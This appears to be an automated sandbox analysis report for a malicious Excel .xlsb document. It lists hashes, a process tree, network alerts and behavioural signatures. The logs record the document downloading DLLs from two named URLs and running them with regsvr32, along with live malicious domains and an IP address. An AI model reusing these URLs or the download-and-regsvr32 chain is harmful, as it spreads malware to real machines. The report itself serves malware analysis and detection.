Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x3201	June 18, 2021, 9:10 a.m.	June 18, 2021, 9:12 a.m.

Size	155.8KB
Type	Microsoft Excel 2007+
MD5	`6c8a2cdc722922d6e468d1d151a24333`
SHA256	`9c0f10e80a5d90e962f16085b5297819126cc6d5072ec590a92b61b1b500aec7`
CRC32	`2335DECB`
ssdeep	`3072:aIIh9vajtC1gBbZmxVymd1xXPMU9VlUBWA6CFvA7bRCxAVIKPM+2:ZIQegBbcxVyWxfMU3liWA6FsYPY`
Yara	None matched

EXCEL.EXE "C:\Program Files\Microsoft Office\Office12\EXCEL.EXE" C:\Users\ADMINI~1\AppData\Local\Temp\aim-2044108491.xlsb
5124
- regsvr32.exe regsvr32 ..\poly1.dll
  3316
- regsvr32.exe regsvr32 ..\poly2.dll
  3016

Name	Response	Post-Analysis Lookup
tattoo-thailand.com	A 192.185.51.79	192.185.51.79
roadtopassiveincomeonline.com	A 192.185.51.79	192.185.51.79

IP Address	Status	Action
164.124.101.2	Active	Moloch
192.185.51.79	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49607 -> 192.185.51.79:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49601 -> 192.185.51.79:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49602 -> 192.185.51.79:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.185.51.79:443 -> 192.168.56.103:49603	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49606 -> 192.185.51.79:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.185.51.79:443 -> 192.168.56.103:49608	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 18, 2021, 9:10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (20 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67e71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67ecf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67ecf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c201000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c201000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77791000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77121000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x772d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75c61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75621000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71e11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71cb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71ca1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75301000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b41000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2021, 9:10 a.m.	process_identifier: 5124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Administrator\poly1.dll
file	C:\Users\Administrator\poly2.dll

Creates hidden or system file (3 events)

Time & API	Arguments	Status
NtCreateFile June 18, 2021, 9:10 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000003ac filepath: C:\Users\Administrator\AppData\Local\Temp\~$aim-2044108491.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$aim-2044108491.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1
NtCreateFile June 18, 2021, 9:10 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000424 filepath: C:\Users\Administrator\AppData\Local\Temp\~$aim-2044108491.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$aim-2044108491.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1
NtCreateFile June 18, 2021, 9:10 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000420 filepath: C:\Users\Administrator\AppData\Local\Temp\~$aim-2044108491.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$aim-2044108491.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1

Creates a suspicious process (2 events)

cmdline	regsvr32 ..\poly1.dll
cmdline	regsvr32 ..\poly2.dll

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW June 18, 2021, 9:10 a.m.	url: https://tattoo-thailand.com/cvAMN0orV9b/moon.html stack_pivoted: 0 filepath_r: ..\poly1.dll filepath: C:\Users\Administrator\poly1.dll		2148270088	0
URLDownloadToFileW June 18, 2021, 9:10 a.m.	url: https://roadtopassiveincomeonline.com/5lsYNUOzniG/moon.html stack_pivoted: 0 filepath_r: ..\poly2.dll filepath: C:\Users\Administrator\poly2.dll		2148270088	0

One or more non-whitelisted processes were created (2 events)

parent_process	excel.exe				martian_process	regsvr32 ..\poly1.dll
parent_process	excel.exe				martian_process	regsvr32 ..\poly2.dll

aim-2044108491.xlsb

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All